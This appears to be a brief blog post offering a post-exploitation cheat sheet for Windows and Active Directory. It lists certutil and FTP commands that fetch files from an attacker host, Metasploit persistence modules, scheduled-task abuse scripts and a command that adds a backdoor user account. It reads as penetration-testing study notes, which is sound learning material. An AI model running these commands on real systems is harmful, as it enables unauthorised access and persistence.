Post Exploitation: Active Directory

Jul 20, 2023

--

File Transfer

Certutil

certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt

HTTP

python -m SimpleHTTPServer 80

Browser

Navigate directly to file

FTP

python -m pyftpdlib 21 (attacker machine)
ftp 10.10.10.10 (Attacker IP)

Linux

wget

Maintaining Access

Persistence Scripts

run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence

Schedule Tasks

run scheduleme
run schtaskabuse

Add a user

net user hacker password123 /add

Pivoting

Moving inside a network from one machine to another machine is known as Pivoting.

We can use Metasploit to attempt Pivoting.

We can use auxiliary/scanner/portscan/tcp in metasploit to attempt Pivoting.

Clean Up

Make the System/Network as it was when you entered it

Remove executables, scripts, and added files.
Remove malware, rootkits, and added user accounts
Set settings back to original configurations

Post Exploitation

Active Directory Security

Active Directory

Active Directory Attack

Windows Post Exploitation

Aditya Jha

Written by Aditya Jha

Help
Status
About
Careers
Press
Blog
Privacy
Terms
Text to speech
Teams